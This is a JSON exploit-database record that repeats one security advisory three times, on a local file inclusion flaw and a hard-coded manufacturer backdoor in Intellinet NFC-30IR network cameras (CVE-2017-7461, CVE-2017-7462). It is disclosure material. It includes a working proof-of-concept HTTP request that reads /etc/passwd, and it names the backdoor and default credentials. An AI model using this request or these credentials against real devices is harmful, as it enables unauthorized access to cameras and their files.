{"zdt": [{"lastseen": "2018-04-12T23:55:28", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2017-04-07T00:00:00", "type": "zdt", "title": "Intellinet NFC-30IR Camera - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7462", "CVE-2017-7461"], "modified": "2017-04-07T00:00:00", "href": "https://0day.today/exploit/description/27537", "id": "1337DAY-ID-27537", "sourceData": "Multiple Vulnerabilities in Intellinet NFC-30IR Network Cameras\r\n \r\n \r\nADVISORY\r\n--------\r\n \r\nTitle: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor\r\nAdvisory ID: BITL-17-001\r\nDate published: 2017-04-05\r\nDate of last update: 2017-04-05\r\nVendors contacted: Intellinet\r\n \r\nVULNERABILITY\r\n-------------\r\n \r\nType: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor\r\nRisk/Impact: Access to sensitive files & Access control bypass.\r\nExploitation Type : Remote\r\nCVE Name: CVE-2017-7461 and CVE-2017-7462\r\n \r\nDESCRIPTION\r\n------------\r\n \r\nWe found two vulnerabilities affecting the Intellinet NFC-30IR Camera with\r\nfirmware version LM.1.6.16.05\r\n \r\n 1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files \r\n by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'\r\n \r\n Instead of the developer using server-side scripts to render information, it takes the \r\n plain text files and uses /fileread CGI script to simply return the plain text - the \r\n site then relies on Javascript to \"format\" the text into something pretty.\r\n \r\n There is no sanitization nor lock-down of what paths that script can read, hence all\r\n files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.\r\n \r\n \r\n 2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script\r\n called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam \r\n \r\n This binary has been analyzed before by other vendors. We did not analyze it again as we \r\n feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the\r\n wireless_mft executable. \r\n \r\n The hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the \r\n below boa.conf snippet;\r\n /----\r\n --snip--\r\n #ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/\r\n ScriptAlias /cgi-bin/operator/ /opt/cgi/operator/\r\n ScriptAlias /cgi-bin/view/ /opt/cgi/view/ \r\n ScriptAlias /cgi-bin/admin/ /opt/cgi/admin/\r\n ScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/\r\n ScriptAlias /cgi-bin/ /opt/cgi/\r\n ScriptAlias /jpg /opt/cgi/jpg\r\n \r\n # MFT: Specify manufacture commands user name and password\r\n MFT manufacture erutcafunam\r\n \r\n --snip--\r\n ----/\r\n \r\n This indicates that the camera hardware may be some kind of modified/stripped version\r\n of a Zavio board.\r\n \r\nVENDOR RESPONSE/NOTIFICATION\r\n----------------------------\r\n \r\nVendor was given 7 days to respond, and 3 written notifications.\r\nNo response received nor acknowledgement. \r\nVendor has not released updates to fix the vulnerabilities.\r\n \r\nCREDITS\r\n-------\r\n \r\nVulnerabilities discovered by Dimitri Fousekis/RuraPenthe\r\nAdditional information on how the manufacture CGI executable works was obtained by\r\ninformation written by Core Security/Francisco Falcon.\r\n \r\nPROOF OF CONCEPT CODE\r\n----------------------\r\n \r\nLOCAL FILE INCLUSION THROUGH CGI FILE READER\r\n/-----\r\nGET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1\r\nHost: 10.0.0.21\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT\r\nReferer: http://10.0.0.21/system_info.htm\r\nCookie: VideoFmt=3\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\n-----/\r\n \r\nABOUT BITLABS\r\n-------------\r\n \r\nBitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian\r\nbased cyber security company. We specialize in providing our clients with research and \r\ninformation to combat current and future attacks on their systems and devices. \r\nBitLabs focuses primarily on IoT device research, identifying vulnerabilities and other \r\nattack vectors that can impact users of these devices negatively. \r\nOur Web address is at : http://www.bitcrack.net \r\n \r\nDISCLAIMER INFO\r\n---------------\r\n \r\nAll content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,\r\nand are licensed under a Creative Commons Attribution Non-Commercial 3.0\r\n(South Africa) License: http://za.creativecommons.org/ and other countries as and when\r\nstipulated.\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/27537", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-04-07T07:17:25", "description": "Intellinet NFC-30IR Camera - Multiple Vulnerabilities. CVE-2017-7461,CVE-2017-7462. Webapps exploit for Hardware platform", "published": "2017-04-07T00:00:00", "type": "exploitdb", "title": "Intellinet NFC-30IR Camera - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7462", "CVE-2017-7461"], "modified": "2017-04-07T00:00:00", "id": "EDB-ID:41829", "href": "https://www.exploit-db.com/exploits/41829/", "sourceData": "Bitcrack Cyber Security - BitLabs Advisory\r\nhttp://www.bitcrack.net\r\n \r\nMultiple Vulnerabilities in Intellinet NFC-30IR Network Cameras\r\n \r\n \r\nADVISORY\r\n--------\r\n \r\nTitle: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor\r\nAdvisory ID: BITL-17-001\r\nDate published: 2017-04-05\r\nDate of last update: 2017-04-05\r\nVendors contacted: Intellinet\r\n \r\nVULNERABILITY\r\n-------------\r\n \r\nType: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor\r\nRisk/Impact: Access to sensitive files & Access control bypass.\r\nExploitation Type : Remote\r\nCVE Name: CVE-2017-7461 and CVE-2017-7462\r\n\r\nDESCRIPTION\r\n------------\r\n \r\nWe found two vulnerabilities affecting the Intellinet NFC-30IR Camera with\r\nfirmware version LM.1.6.16.05\r\n \r\n 1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files \r\n by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'\r\n \r\n Instead of the developer using server-side scripts to render information, it takes the \r\n plain text files and uses /fileread CGI script to simply return the plain text - the \r\n site then relies on Javascript to \"format\" the text into something pretty.\r\n \r\n There is no sanitization nor lock-down of what paths that script can read, hence all\r\n files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.\r\n \r\n\r\n 2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script\r\n called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam \r\n \r\n This binary has been analyzed before by other vendors. We did not analyze it again as we \r\n feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the\r\n wireless_mft executable. \r\n\r\n\tThe hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the \r\n\tbelow boa.conf snippet;\r\n\t/----\r\n\t--snip--\r\n\t#ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/\r\n\tScriptAlias /cgi-bin/operator/ /opt/cgi/operator/\r\n\tScriptAlias /cgi-bin/view/ /opt/cgi/view/ \r\n\tScriptAlias /cgi-bin/admin/ /opt/cgi/admin/\r\n\tScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/\r\n\tScriptAlias /cgi-bin/ /opt/cgi/\r\n\tScriptAlias /jpg /opt/cgi/jpg\r\n\r\n\t# MFT: Specify manufacture commands user name and password\r\n\tMFT manufacture erutcafunam\r\n\t\r\n\t--snip--\r\n\t----/\r\n\t\r\n\tThis indicates that the camera hardware may be some kind of modified/stripped version\r\n\tof a Zavio board.\r\n \r\nVENDOR RESPONSE/NOTIFICATION\r\n----------------------------\r\n \r\nVendor was given 7 days to respond, and 3 written notifications.\r\nNo response received nor acknowledgement. \r\nVendor has not released updates to fix the vulnerabilities.\r\n \r\nCREDITS\r\n-------\r\n \r\nVulnerabilities discovered by Dimitri Fousekis/RuraPenthe\r\nAdditional information on how the manufacture CGI executable works was obtained by\r\ninformation written by Core Security/Francisco Falcon.\r\n \r\nPROOF OF CONCEPT CODE\r\n----------------------\r\n\r\nLOCAL FILE INCLUSION THROUGH CGI FILE READER\r\n/-----\r\nGET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1\r\nHost: 10.0.0.21\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT\r\nReferer: http://10.0.0.21/system_info.htm\r\nCookie: VideoFmt=3\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\n-----/\r\n \r\nABOUT BITLABS\r\n-------------\r\n \r\nBitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian\r\nbased cyber security company. We specialize in providing our clients with research and \r\ninformation to combat current and future attacks on their systems and devices. \r\nBitLabs focuses primarily on IoT device research, identifying vulnerabilities and other \r\nattack vectors that can impact users of these devices negatively. \r\nOur Web address is at : http://www.bitcrack.net \r\n\r\nDISCLAIMER INFO\r\n---------------\r\n \r\nAll content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,\r\nand are licensed under a Creative Commons Attribution Non-Commercial 3.0\r\n(South Africa) License: http://za.creativecommons.org/ and other countries as and when\r\nstipulated.\r\n \r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41829/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:21", "description": "\nIntellinet NFC-30IR Camera - Multiple Vulnerabilities", "edition": 1, "published": "2017-04-07T00:00:00", "title": "Intellinet NFC-30IR Camera - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7462", "CVE-2017-7461"], "modified": "2017-04-07T00:00:00", "id": "EXPLOITPACK:A90405FAA6EC34FF4573C08E715E44A3", "href": "", "sourceData": "Bitcrack Cyber Security - BitLabs Advisory\nhttp://www.bitcrack.net\n \nMultiple Vulnerabilities in Intellinet NFC-30IR Network Cameras\n \n \nADVISORY\n--------\n \nTitle: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor\nAdvisory ID: BITL-17-001\nDate published: 2017-04-05\nDate of last update: 2017-04-05\nVendors contacted: Intellinet\n \nVULNERABILITY\n-------------\n \nType: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor\nRisk/Impact: Access to sensitive files & Access control bypass.\nExploitation Type : Remote\nCVE Name: CVE-2017-7461 and CVE-2017-7462\n\nDESCRIPTION\n------------\n \nWe found two vulnerabilities affecting the Intellinet NFC-30IR Camera with\nfirmware version LM.1.6.16.05\n \n 1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files \n by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'\n \n Instead of the developer using server-side scripts to render information, it takes the \n plain text files and uses /fileread CGI script to simply return the plain text - the \n site then relies on Javascript to \"format\" the text into something pretty.\n \n There is no sanitization nor lock-down of what paths that script can read, hence all\n files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.\n \n\n 2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script\n called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam \n \n This binary has been analyzed before by other vendors. We did not analyze it again as we \n feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the\n wireless_mft executable. \n\n\tThe hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the \n\tbelow boa.conf snippet;\n\t/----\n\t--snip--\n\t#ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/\n\tScriptAlias /cgi-bin/operator/ /opt/cgi/operator/\n\tScriptAlias /cgi-bin/view/ /opt/cgi/view/ \n\tScriptAlias /cgi-bin/admin/ /opt/cgi/admin/\n\tScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/\n\tScriptAlias /cgi-bin/ /opt/cgi/\n\tScriptAlias /jpg /opt/cgi/jpg\n\n\t# MFT: Specify manufacture commands user name and password\n\tMFT manufacture erutcafunam\n\t\n\t--snip--\n\t----/\n\t\n\tThis indicates that the camera hardware may be some kind of modified/stripped version\n\tof a Zavio board.\n \nVENDOR RESPONSE/NOTIFICATION\n----------------------------\n \nVendor was given 7 days to respond, and 3 written notifications.\nNo response received nor acknowledgement. \nVendor has not released updates to fix the vulnerabilities.\n \nCREDITS\n-------\n \nVulnerabilities discovered by Dimitri Fousekis/RuraPenthe\nAdditional information on how the manufacture CGI executable works was obtained by\ninformation written by Core Security/Francisco Falcon.\n \nPROOF OF CONCEPT CODE\n----------------------\n\nLOCAL FILE INCLUSION THROUGH CGI FILE READER\n/-----\nGET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1\nHost: 10.0.0.21\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nIf-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT\nReferer: http://10.0.0.21/system_info.htm\nCookie: VideoFmt=3\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\n-----/\n \nABOUT BITLABS\n-------------\n \nBitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian\nbased cyber security company. We specialize in providing our clients with research and \ninformation to combat current and future attacks on their systems and devices. \nBitLabs focuses primarily on IoT device research, identifying vulnerabilities and other \nattack vectors that can impact users of these devices negatively. \nOur Web address is at : http://www.bitcrack.net \n\nDISCLAIMER INFO\n---------------\n \nAll content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,\nand are licensed under a Creative Commons Attribution Non-Commercial 3.0\n(South Africa) License: http://za.creativecommons.org/ and other countries as and when\nstipulated.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}